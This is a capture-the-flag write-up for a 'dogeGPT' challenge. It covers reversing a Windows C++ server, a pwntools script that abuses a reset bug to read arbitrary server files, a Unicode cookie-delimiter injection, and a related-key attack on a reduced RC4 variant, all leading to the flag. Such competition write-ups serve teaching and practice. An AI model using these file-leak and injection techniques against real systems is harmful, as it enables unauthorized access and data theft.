Level 10: dogeGPT (rev, pwn, web, crypto)
After registering at the challenge website, we are redirected to /start.php, which contains a button that starts the dogeGPT service. The service is accessible via a TCP connection.
The service allows us to start a chat and enter a prompt, which 'dogeGPT' will respond to.
We can also display a help menu, but it seems useless. There is also a get dogekey option, but it doesn't seem to do anything.
Digging deeper into start.php, we find an HTML comment referencing a 'files.php' endpoint and a 'decrypt-flag.php' endpoint.
<!--
lol i forgot to delete a comment
<a href="/files.php">Download dogeGPT here!</a><br><br>
<a href="/decrypt-flag.php">Shutdown dogeGPT and retrieve flag here :(</a>
-->
Heading over to /files.php, we can download the dogeGPT.exe binary. The /files.php endpoint also leaks, via an error message, the path of its own source file: C:\lmao\weird\folder\htdocs\files.php.
Inspecting cookies, we can observe that a cookie u is set. Its value appears to be
base64_encode(username + "\x80" + md5_hex(username)[:16])
For example, registering as admin gives YWRtaW6AMjEyMzJmMjk3YTU3YTVhNw==, which decodes to admin\x8021232f297a57a5a7.
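The observed cookie format can be reproduced in a few lines of Python. This is a sketch of the behaviour seen from the outside (the server-side code is only confirmed later, in the Web section); make_cookie is a name chosen for illustration.

```python
import base64
import hashlib

def make_cookie(username: str) -> str:
    """Rebuild the u cookie: username + 0x80 + first 16 hex chars of md5(username)."""
    raw = username.encode()
    digest_prefix = hashlib.md5(raw).hexdigest()[:16].encode()
    return base64.b64encode(raw + b"\x80" + digest_prefix).decode()

print(make_cookie("admin"))  # YWRtaW6AMjEyMzJmMjk3YTU3YTVhNw==
```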
Rev
Opening the dogeGPT.exe binary in IDA, we quickly realize that it is a C++ executable (the .i64 file can be found here). I'll be referring to functions and global variables by the names I gave them in IDA.
We define the following structs in IDA to help us better understand the code:
struct cpp_str {
  char* ptr;
  char extra_data[8];
  __int64 length;  // long is only 32 bits on Windows x64
  __int64 cap;     // named cap to match the decompiled code below
};
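If the string is shorter than 16 bytes (at most 15 characters plus the terminating NUL), it is stored inline in the ptr and extra_data fields. Otherwise, the string is stored on the heap and ptr points to it. This is why the decompiled code repeatedly checks cap >= 0x10 before deciding whether to use ptr or the struct itself as the string buffer.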
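To make the small-string rule concrete, here is a sketch that decodes a 32-byte cpp_str dumped from memory. It assumes the layout above with 8-byte little-endian length and cap fields (64-bit build) and mirrors the decompiled code's cap >= 0x10 check; read_heap is a hypothetical callback standing in for a debugger's memory read.

```python
import struct
from typing import Callable

def decode_cpp_str(raw: bytes, read_heap: Callable[[int, int], bytes]) -> bytes:
    """Decode a 32-byte cpp_str: 16-byte buffer/pointer, then length and cap."""
    buf, length, cap = struct.unpack("<16sQQ", raw)
    if cap < 0x10:
        # short string: the characters live inline in ptr + extra_data
        return buf[:length]
    # long string: the first 8 bytes of the buffer are a heap pointer
    (ptr,) = struct.unpack("<Q", buf[:8])
    return read_heap(ptr, length)

# inline example: "help" (length 4, cap 15)
inline = b"help".ljust(16, b"\0") + struct.pack("<QQ", 4, 15)
print(decode_cpp_str(inline, lambda addr, n: b""))
```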
struct cpp_str_arr {
cpp_str* start;
cpp_str* end;
cpp_str* limit;
};
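This struct functions like a resizable array (it matches the layout of a std::vector<std::string>: start, end and limit point to the first element, one past the last element, and the end of the allocated storage). If end == limit, the array is reallocated to accommodate more cpp_strs.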
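Since every element is a 32-byte cpp_str, the number of stored strings and the allocated capacity follow directly from the three pointers. A sketch, assuming the 32-byte cpp_str layout above (vector_counts is a hypothetical helper):

```python
CPP_STR_SIZE = 32  # sizeof(cpp_str): 16-byte buffer + length + cap

def vector_counts(start: int, end: int, limit: int) -> tuple[int, int]:
    """Return (size, capacity) of a cpp_str_arr given its three pointers."""
    size = (end - start) // CPP_STR_SIZE
    capacity = (limit - start) // CPP_STR_SIZE
    return size, capacity

# end == limit: the array is full, so the next append has to reallocate
print(vector_counts(0x1000, 0x1060, 0x1060))  # (3, 3)
```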
After some debugging and trial and error, I realized that the program required 4 arguments. The second argument is the IP to accept connections from, and the fourth is the port to listen on.
The purpose of the first and third arguments will be discussed later.
Tracing the execution flow for the input get dogekey leads us to read_keyfile.
cpp_str *__fastcall read_keyfile(cpp_str *output)
{
cpp_str *v2; // rax
cpp_str *v3; // rax
__int64 v4; // rdx
cpp_str *v5; // rax
cpp_str *v6; // rax
char *ptr; // rcx
char *v8; // rcx
cpp_str Block; // [rsp+20h] [rbp-78h] BYREF
cpp_str *v11; // [rsp+48h] [rbp-50h]
cpp_str v12; // [rsp+50h] [rbp-48h] BYREF
cpp_str v13; // [rsp+70h] [rbp-28h] BYREF
v11 = output;
if ( key_flag )
{
v2 = copy(&v13, &key_filename);
v3 = read_whole_file(&v12, (__int64)v2);
v5 = concat2(v3, v4, "Congrats! The dogekey has been encrypted! It is: ", 0x31ui64);
memset(&Block, 0, sizeof(Block));
Block = *v5;
v5->length = 0i64;
v5->cap = 15i64;
LOBYTE(v5->ptr) = 0;
v6 = append(&Block, "\n", 1ui64);
// output
}
else
{
*(_OWORD *)&output->ptr = 0i64;
output->length = 0i64;
output->cap = 0i64;
append_str(output, "\n", 1ui64);
}
return output;
}
If the key_flag global variable is not set, the function returns a string containing only a newline, which explains why nothing seems to happen when we enter get dogekey. If key_flag is set, the file referenced by key_filename is read and its contents are sent to the user after the "Congrats!" message.
Searching for references to key_flag leads us to this fragment of code in print_doge:
v6 = copy(&out, input);
hash(&v163, (__int64)v6);
last = get_first_(&v163, &hash_subset, 0i64, 0x10ui64);
v8 = memcmp_hash(last);
reset_str(&hash_subset);
v9 = key_flag;
if ( v8 )
v9 = 1;
key_flag = v9;
hash computes the MD5 hash of the input and writes the hex-encoded digest to v163. get_first_ then extracts the first 0x10 characters of the digest into hash_subset, and memcmp_hash compares them with the third argument to the program (stored in the global variable hash_val). If they match, key_flag is set to 1; otherwise it keeps its previous value.
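In Python terms, the check in print_doge amounts to the following sketch. update_key_flag is a made-up name, and hash_val stands for the program's third argument; the sample value is simply the 16-character MD5 prefix of admin.

```python
import hashlib

def update_key_flag(key_flag: bool, user_input: str, hash_val: str) -> bool:
    """Mimic print_doge: set key_flag if md5(input)[:16] matches hash_val."""
    hash_subset = hashlib.md5(user_input.encode()).hexdigest()[:0x10]
    # once set, the flag is never cleared here (v9 keeps the old value)
    return key_flag or hash_subset == hash_val

print(update_key_flag(False, "admin", "21232f297a57a5a7"))  # True
```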
Hmm, this seems quite similar to the u cookie we discovered earlier, which contains the first 16 characters of the MD5 hash of our username. Maybe hash_val is also the first 16 characters of the MD5 hash of our username?
This is confirmed when we enter our username, followed by get dogekey: the string Congrats! The dogekey has been encrypted! It is: is printed, indicating that key_flag has been set.
However, the dogekey itself is still not revealed, because the key_filename variable has not been set. Searching for references to key_filename, we find the gen_keyfilename function, which is called in print_doge:
if ( (unsigned __int16)result_accumulator == (_DWORD)v159 )
gen_keyfilename(v140, v139, v141);
Using a debugger, we can observe that result_accumulator is initialized to 0xd06e and v159 is the integer value represented by the last 4 hex characters of hash_val (which is the first 16 characters of the MD5 hash of our username). Because of the (unsigned __int16) cast, only the low 16 bits of result_accumulator take part in the comparison.
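A sketch of that condition (should_gen_keyfilename is a hypothetical name; the example hash_val is the one for the username lUArf,0 used later in this writeup):

```python
INITIAL_ACCUMULATOR = 0xD06E  # observed initial value of result_accumulator

def should_gen_keyfilename(result_accumulator: int, hash_val: str) -> bool:
    """True when the low 16 bits of the accumulator equal the last 4 hex chars of hash_val."""
    v159 = int(hash_val[-4:], 16)
    return (result_accumulator & 0xFFFF) == v159

print(should_gen_keyfilename(INITIAL_ACCUMULATOR + 7689, "ec6b23e906d9ee77"))  # True
```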
Searching for references to result_accumulator leads us to spawn_process, where our input is passed to the C:\dogeGPT\parser.py program:
join(
&lpCommandLine,
(__int64)input,
a3,
"C:\\Progra~1\\Python311\\python.exe c:\\dogeGPT\\parser.py ",
0x36ui64,
ptr,
input->length
);
// ...
if ( !CreateProcessA(0i64, p_lpCommandLine, 0i64, 0i64, 1, 0x10u, 0i64, 0i64, &StartupInfo, &ProcessInformation) )
{
CloseHandle(hWritePipe);
CloseHandle(hReadPipe);
LABEL_5:
v6 = 0i64;
goto LABEL_6;
}
The output of the process is then parsed:
if ( Buf.length && (v16 = memchr(process_output, ',', Buf.length)) != 0i64 )
comma_index = (_DWORD)v16 - (_DWORD)process_output;
else
comma_index = -1;
v18 = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
v18 = Buf.ptr;
if ( length && (v19 = memchr(v18, '\r', length)) != 0i64 )
newline_index = (_DWORD)v19 - (_DWORD)v18;
else
newline_index = -1;
if ( comma_index && newline_index )
{
memset(&v48, 0, sizeof(v48));
v21 = comma_index;
if ( length < comma_index )
v21 = length;
v22 = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
v22 = Buf.ptr;
append_str(&v48, v22, v21);
after_comma = comma_index + 1;
memset(&String, 0, sizeof(String));
if ( Buf.length < after_comma )
invalid_strpos();
num_len = newline_index - comma_index - 1;
if ( Buf.length - after_comma < num_len )
num_len = Buf.length - after_comma;
buf_ptr = (char *)&Buf;
if ( Buf.cap >= 0x10ui64 )
buf_ptr = Buf.ptr;
append_str(&String, &buf_ptr[after_comma], num_len);
v26 = errno();
v27 = v26;
p_String = (char *)&String;
if ( String.cap >= 0x10ui64 )
p_String = String.ptr;
*v26 = 0;
v29 = strtol(p_String, (char **)NumberOfBytesRead, 10);
if ( p_String == *(char **)NumberOfBytesRead )
{
std::_Xinvalid_argument("invalid stoi argument");
__debugbreak();
}
if ( *v27 == 34 )
{
std::_Xout_of_range("stoi argument out of range");
__debugbreak();
}
result_accumulator += v29;
// ...
}
Here's a rough Python equivalent of that long, confusing chunk of code:
s, i = process_output.split(",")[:2]
result_accumulator += int(i)
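The two lines above gloss over a couple of details: the binary takes the number from between the first , and the first \r, and strtol stops at the first non-digit. A slightly more faithful sketch (parse_increment is a hypothetical helper, and the regex only approximates strtol's base-10 parsing):

```python
import re

def parse_increment(process_output: str) -> int:
    """Approximate the binary: parse the integer between the first ',' and first '\\r'."""
    comma_index = process_output.find(",")
    newline_index = process_output.find("\r")
    field = process_output[comma_index + 1:newline_index]
    # strtol skips leading whitespace, then reads an optional sign and digits
    match = re.match(r"\s*[+-]?\d+", field)
    if match is None:
        raise ValueError("invalid stoi argument")
    return int(match.group())

print(parse_increment("awyuyruyuyrueure,7689,42\r\n"))  # 7689
```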
From this, we can infer that parser.py outputs something of the form string,integer. The integer portion of the output is parsed and added to result_accumulator, and the string portion appears to be derived from our input string. Therefore, if our input contains a , character followed by an integer, we can control the value of v29 and thus the value of result_accumulator. Since we know both the initial value of result_accumulator and the value it needs to reach, we can calculate the input required.
I wrote a script to generate inputs that satisfy both conditions, i.e. that set key_flag and make print_doge call gen_keyfilename (which sets key_filename):
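import hashlib
import random
import string

INITIAL_ACC = 0xD06E  # initial value of result_accumulator

def get5():
    # random 5-letter prefix for the username
    return "".join(random.choice(string.ascii_letters) for _ in range(5)).encode()

def gen(a):
    h = hashlib.md5(a).hexdigest()[:16]  # hash_val: what the u cookie / argv[3] holds
    target = int(h[-4:], 16)  # v159: last 4 hex chars of hash_val
    if target < INITIAL_ACC:
        return False  # would need a negative increment; try another username
    return h, a, f"awyuyruyuyrueure,{target - INITIAL_ACC}"

def gen_rnd():
    res = False
    while not res:
        # the ",0" suffix makes the username itself add 0 to result_accumulator
        res = gen(get5() + b",0")
    return res

print(gen_rnd())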
One possible input combination is username = lUArf,0 and subsequent input awyuyruyuyrueure,7689. Since the first 16 characters of the MD5 hash of lUArf,0 are ec6b23e906d9ee77 and 7689 + 0xd06e = 0xee77, the gen_keyfilename function will be called. The username needs to end in ,0 so that entering it does not change result_accumulator.
After registering as lUArf,0, entering lUArf,0 and then awyuyruyuyrueure,7689 makes get dogekey print the dogekey, but unfortunately this doesn't bring us much closer to the flag:
get dogekey
Congrats! The dogekey has been encrypted! It is: 89abe660cba142e3e8b2861ca5e8b81a
Upon further debugging, it appears that this "encrypted" dogekey is simply the first argument of the binary, which is written to C:\dogeGPT\<ip>-<username hash> when the gen_keyfilename function is called.
Pwn
After a week of reversing and debugging the binary, I noticed some very strange behavior. In the start_server function, load_files is called when a user connects to the dogeGPT process. It loads the path of the help file and the paths of the wordlists used to generate dogeGPT responses into a global filenames variable (a cpp_str_arr).
Interestingly, in the process_input function, user input is also appended to this array, even though it is not a filename:
if ( filenames.end == filenames.limit )
{
copy_with_resize(&filenames, filenames.end, input);
end = filenames.end;
}
else
{
copy(filenames.end, input);
end = ++filenames.end;
}
As a result, filenames ends up holding a mix of user input and actual filenames.
When the chat is ended, the filenames array is reset:
if ( filenames.start != end )
{
delete_string_range(filenames.start, end);
filenames.end = filenames.start;
}
files_loaded = 0;
cleanup_keyfile();
v18 = 15i64;
v19 = "Ending chat...\n";
However, the help menu still works after the chat has ended. Its handler does the following:
v8 = copy(&v26, filenames.start);
v9 = read_whole_file(&Block, (__int64)v8);
v10 = append(v9, "\n", 1ui64);
*(_OWORD *)&output->ptr = 0i64;
output->length = 0i64;
output->cap = 0i64;
*output = *v10;
It reads the file referenced by filenames.start and returns its contents to the user. This normally works because help.txt is the first file that's loaded. However, ending the chat sets filenames.end back to filenames.start, so the next line we send is copied into the first slot. filenames.start then no longer contains help.txt but our user input! Therefore, we can trick the program into exposing arbitrary files.
We can use this vulnerability to leak parser.py, as well as start.php, which is responsible for starting the dogeGPT service:
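from pwn import *
import sys

ip, port = sys.argv[1], sys.argv[2]  # address of our dogeGPT instance (from /start.php)
r = remote(ip, int(port))
path = rb"C:\lmao\weird\folder\htdocs\start.php"  # file to leak
r.sendline(b"end chat")            # reset filenames: end = start
r.sendlineafter(b"...", path)      # our path is copied into filenames.start
r.sendlineafter(b"...", b"help")   # help reads filenames.start, i.e. our path
pause(1)
data = r.clean()
print(data.decode(errors="replace"))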
Web
After leaking index.php using the bug described in the previous section, we find the following code, which generates the u cookie:
$str = $_POST['uname'];
if (!preg_match("/[\p{N}\p{Z}\p{L}\p{M}]*/u",$str) || $str == "") {
echo("Bad username!!<br>");
die();
}
$h = substr(md5($str),0,16);
$uid = base64_encode($str . "\x80" . $h);
setcookie("u", $uid, time()+60);
As expected, $uid is a base64 string consisting of the username concatenated with \x80 and the first 16 characters of the MD5 hash of the username.
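Using regex101 to explain the regex, \p{L} matches 'any kind of letter from any language'. In fact, because the pattern is unanchored and uses *, it matches any valid UTF-8 input; the real restriction comes from the /u modifier, which makes preg_match fail on invalid UTF-8, so a raw \x80 byte on its own is rejected. Luckily, the Unicode code point U+FF80 is タ (HALFWIDTH KATAKANA LETTER TA), which is encoded in UTF-8 as EF BE 80. It is valid UTF-8, so it passes the check, yet its last byte lets us inject the \x80 delimiter and supply a fake MD5 hash. To see why this matters, let's look at start.php: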
$aa = explode("\x80", base64_decode($uid));
if (!preg_match("/^[\da-f]+$/u",$aa[1])) {
header("Location: /");
die();
}
$uid = substr($aa[1],0,16);
exec("reg query HKCU\dogeGPT\ -v pri_key", $a1);
$pri = explode(" ", $a1[2])[3];
exec("reg query HKCU\dogeGPT\ -v dogekey", $a2);
$f = explode(" ", $a2[2])[3];
$ef = enc($pri, $uid, $f);
$ip = $_SERVER['REMOTE_ADDR'];
$pt = rand(20000, 47000);
proc_open("C:\\dogeGPT\\dogeGPT.exe " . $ef . " " . $ip . " " . $uid . " " . $pt, [0=>["pipe","r"]], $p);
The $uid is used as an input to the enc function, which produces $ef, the 'encrypted dogekey' that dogeGPT.exe receives as its first argument. By using the Unicode trick explored above, we can set $uid to any hexadecimal string we want (up to 16 characters, because of the substr call).
Crypto
The enc function is defined in encrypt.php. It's quite long, so here's a simplified Python equivalent:
def encrypt(prikey, uid, data):
    # KSA over a 16-entry sbox; key nibble i = (prikey[i] + uid[i]) mod 16
    sbox = [i for i in range(16)]
    keystream = [(x + y) % 16 for x, y in zip(prikey, uid)]
    j = 0
    for i in range(16):
        j = (j + sbox[i] + keystream[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]
    # PRGA: each output nibble is a data nibble XORed with a keystream nibble
    i = 0
    j = 0
    out = []
    for k in range(len(data)):
        i = (i + 1) % 16
        j = (j + sbox[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]
        keychar = (sbox[i] + sbox[j]) % 16
        out.append(data[k] ^ sbox[keychar])
    return out
If you're well versed in crypto, you'll recognize this as a variant of RC4, except that the sbox has been reduced to a permutation of 16 nibbles (values 0 to 15, i.e. 8 bytes of state) instead of the 256-byte permutation of full RC4. We can also influence the key used to initialize the sbox: each key nibble is (prikey[i] + uid[i]) mod 16, and we control uid.
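In other words, choosing uid lets us request encryptions under keys that differ from the unknown private key by any nibble-wise difference we like, which is the related-key setting. A sketch of that relationship, with uid modelled as a list of 16 nibbles like prikey in the port above (effective_key and related_uid are hypothetical helpers; how encrypt.php maps the hex $uid to nibbles is an assumption here):

```python
def effective_key(prikey: list[int], uid: list[int]) -> list[int]:
    # same as `keystream` in encrypt(): nibble-wise addition mod 16
    return [(x + y) % 16 for x, y in zip(prikey, uid)]

def related_uid(position: int, delta: int) -> list[int]:
    """uid that adds `delta` to one key nibble and leaves the others unchanged."""
    uid = [0] * 16
    uid[position] = delta % 16
    return uid

print(related_uid(3, 5))
```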
Since I'm quite bad at crypto, I was stuck at this stage for a while, until the challenge author prompted me to explore the system further.
This led me to take a closer look at parser.py:
import sys
import requests
import openai

text = ""
for i in range(len(sys.argv)):
    if i > 0:
        text = text + sys.argv[i] + " "
response = openai.ChatComplete.create(model="doge-gpt-0.1", messages=text)
c = 0
if len(response) != 0:
    for i in range(requests.get_len() // len(text)):
        if requests.is_sus(i):
            c += i
    print(response[c % len(response)]+","+str(c))
else:
    print(",0")
Obviously, this requests is not the real requests library, since the real library has no is_sus function. Reading its requests.py file revealed the following QR code:
m = "@@@@@@@ @@ @ @ @@@@@@@"
m += "@ @ @@ @ @@@@ @ @ @"
m += "@ @@@ @ @ @@ @ @ @ @@@ @"
m += "@ @@@ @ @ @ @@@ @@@@ @ @@@ @"
m += "@ @@@ @ @ @@ @ @@@ @ @@@ @"
m += "@ @ @ @ @@@ @ @"
m += "@@@@@@@ @ @ @ @ @ @ @ @@@@@@@"
m += " @@ @@ @@ @ "
m += "@ @ @ @ @@@ @@ @ @ @ @ "
m += "@@ @@ @ @ @@ @ @ @ @ @"
m += " @ @@@@ @ @ @ @@ @@ @ @@@"
m += " @ @ @ @ @ "
m += "@ @@ @ @@ @@ @ @@ @ @@"
m += " @ @@ @ @ @@@@@@@@ @ @"
m += "@@ @ @@@@@@@ @@@@ @ @@@ @@"
m += "@@ @ @@ @@ @@ @@@ @@@ @ @ "
m += "@ @@ @ @ @@ @@@@ @ @@"
m += " @@ @ @@@ @@ @@@@ @@ @"
m += "@ @ @@@ @@ @ @ @ @@ @@"
m += " @@ @ @ @ @@ @@ @@ @ "
m += "@ @ @@ @@@ @ @@@ @@@@@ "
m += " @@ @ @@ @ @ @ @@@"
m += "@@@@@@@ @@ @@@ @@@ @ @@ @@"
m += "@ @ @@ @@ @@ @ @@ @ "
m += "@ @@@ @ @@ @@ @ @@@@@ @ "
m += "@ @@@ @ @ @@ @ @@ @ "
m += "@ @@@ @ @@ @@@ @ @ @@@ @"
m += "@ @ @ @@ @ @@ @ "
m += "@@@@@@@ @ @@@ @ @@@ @ @@"
def is_sus(i):
    return(m[i % len(m)] == "@")

def get_len():
    return(len(m))
A scannable version of the QR code can be found here.
I realized that it would be too expensive to make real requests to OpenAI, so the openai library used here must be fake too. Indeed, it was:
import nltk
import numpy

class ChatComplete:
    def create(model, messages):
        text = nltk.word_tokenize(messages)
        tags = nltk.pos_tag(text)
        stuff = []
        for tag in tags:
            if tag[1] == "NN" or tag[1] == "NNP":
                if numpy.is_sus(len(tag[0])*len(tags)):
                    stuff.append(tag[0])
                    stuff.append(tag[0])
                    stuff.append(tag[0])
                else:
                    stuff.append(tag[0])
                    stuff.append(tag[0])
            if tag[1] == "VBG" or tag[1] == "JJ":
                if numpy.is_sus(len(tag[0])*len(tags)):
                    stuff.append(tag[0])
                    stuff.append(tag[0])
                else:
                    stuff.append(tag[0])
                    stuff.append(tag[0])
                    stuff.append(tag[0])
            if tag[1] == "VB":
                if numpy.is_sus(len(tag[0])*len(tags)):
                    stuff.append(tag[0])
        return stuff
This revealed the use of the nltk library (which was legitimate) and of numpy, which, like requests, turned out to be fake (the real NumPy has no is_sus function) and contained the following QR code:
m = "@@@@@@@ @ @@ @@@@@@@"
m += "@ @ @ @ @@@@ @ @"
m += "@ @@@ @ @ @ @@@ @"
m += "@ @@@ @ @@@ @@@@@ @ @@@ @"
m += "@ @@@ @ @ @ @ @ @@@ @"
m += "@ @ @@ @@ @@ @ @"
m += "@@@@@@@ @ @ @ @ @ @@@@@@@"
m += " @@@ @@ "
m += "@@@@@ @@@@ @ @@@@@ @ @ @ "
m += " @@@@@ @ @ @ @@ @ @@ "
m += " @ @@ @ @ @ @@@@@ @ @@"
m += "@ @ @@ @@ @ @ @@ @"
m += " @@@@ @@ @@@@@@@@ @@ "
m += "@@@@@ @@@ @ @ @@"
m += "@ @@@@@@ @@@@@@@@@@@@@ @@"
m += "@ @ @ @@ @@@ "
m += "@ @ @@@ @@ @@@@@@@@ "
m += " @@ @@ @@ @ "
m += "@@@@@@@ @ @@ @ @ @@ @"
m += "@ @ @ @@ @@ @ @@"
m += "@ @@@ @ @@ @ @@@@@@@@@@@"
m += "@ @@@ @ @@@ @ @@@@ @@@"
m += "@ @@@ @ @@ @@ @ @ @ @"
m += "@ @ @ @ @ @@ @@ @"
m += "@@@@@@@ @@ @ @ @@@@"
def is_sus(i):
    return(m[i % len(m)] == "@")
That QR code decodes to .\htdocs\welp-sus.pdf, which corresponds to http://13.251.171.1/welp-sus.pdf.
That PDF is the first page of A New Practical Key Recovery Attack on the Stream Cipher RC4 under Related-Key Model, which seems to be exactly the attack to use in this case.
My implementation of the attack can be found here: attack.py, worker.py, get_encryption.py. I used 4 worker processes to speed things up, and after a couple of hours the full key was leaked:
[12, 3, 9, 0, 12, 2, 11, 10, 12, 4, 10, 3, 12, 6, 9, 0]
Next, I obtained the encrypted dogekey with uid=0:
9e51eafb37f35cd7b8ada161c19e875c
and decrypted it using the leaked key to reveal the following decrypted dogekey:
600d715cf1a6baadd06e10000d011a55
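Because this RC4 variant XORs a keystream into the data, decryption is the same operation as encryption. A sketch that reuses the nibble-based port of enc from the Crypto section (repeated here so the block runs on its own), assuming one nibble per hex character and that uid=0 corresponds to an all-zero uid list, so the effective key equals the private key:

```python
def encrypt(prikey, uid, data):
    # nibble-sized RC4 port: KSA then PRGA over a 16-entry sbox
    sbox = list(range(16))
    key = [(x + y) % 16 for x, y in zip(prikey, uid)]
    j = 0
    for i in range(16):
        j = (j + sbox[i] + key[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]
    i = j = 0
    out = []
    for nibble in data:
        i = (i + 1) % 16
        j = (j + sbox[i]) % 16
        sbox[i], sbox[j] = sbox[j], sbox[i]
        out.append(nibble ^ sbox[(sbox[i] + sbox[j]) % 16])
    return out

def decrypt_hex(prikey, uid, ciphertext_hex):
    nibbles = [int(c, 16) for c in ciphertext_hex]
    return "".join(f"{n:x}" for n in encrypt(prikey, uid, nibbles))

leaked_key = [12, 3, 9, 0, 12, 2, 11, 10, 12, 4, 10, 3, 12, 6, 9, 0]
print(decrypt_hex(leaked_key, [0] * 16, "9e51eafb37f35cd7b8ada161c19e875c"))
```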
Reading decrypt-flag.php, we see that a check has been added to only allow local access:
<?php
if ($_SERVER['REMOTE_ADDR'] != "127.0.0.1") {
header("HTTP/1.1 401 Unauthorized");
echo "<h1>401 Unauthorized: Access Denied LMAO</h1>";
die;
}
$flag = "";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
$enc_flag = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0=";
$key = $_POST['dogekey'];
for ($i = 0; $i < 0xffffff; $i++) {
$key = hash('sha256', $key);
}
$cipher = "aes-256-cbc";
$flag = openssl_decrypt(base64_decode($enc_flag), $cipher, $key);
}
?>
Since the check only looks at REMOTE_ADDR, we can run the leaked decrypt-flag.php on a local PHP web server, visit it, and enter the decrypted dogekey. The flag is returned:
TISC{5UCH_@I_V3RY_IF_3153_W0W}
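For reference, here is a stdlib-only sketch of the inputs that decrypt-flag.php hands to OpenSSL, based on documented PHP behaviour: hash('sha256', ...) returns lowercase hex, openssl_decrypt() with options set to 0 base64-decodes its data argument (so the flag is effectively base64-encoded twice), an over-long key is silently truncated to the cipher's 32-byte key length, and the missing IV is padded with NUL bytes. The AES-256-CBC step itself is left to a crypto library; flag_cipher_inputs is a made-up name, and this sketch has not been checked against the real flag.

```python
import base64
import hashlib

ENC_FLAG = "cHAwNlJXZ3hYY0V1TmVyK3VacEN2NVdwNUhZRGh2ZFFUa1JQVlp2M1ByWT0="

def flag_cipher_inputs(dogekey: str, rounds: int = 0xFFFFFF) -> tuple[bytes, bytes, bytes]:
    """Return (key, iv, ciphertext) as decrypt-flag.php would pass them to AES-256-CBC."""
    key = dogekey
    for _ in range(rounds):  # 16.7M rounds by default: slow in pure Python
        key = hashlib.sha256(key.encode()).hexdigest()
    aes_key = key.encode()[:32]  # PHP truncates the 64-char hex string to 32 bytes
    iv = b"\0" * 16              # no IV given, so PHP pads it with NULs
    # base64_decode() in the PHP source, then again inside openssl_decrypt()
    ciphertext = base64.b64decode(base64.b64decode(ENC_FLAG))
    return aes_key, iv, ciphertext
```

Calling flag_cipher_inputs("600d715cf1a6baadd06e10000d011a55") yields a 32-byte key, a zero IV and two AES blocks of ciphertext, which is consistent with a 30-character flag plus PKCS#7 padding.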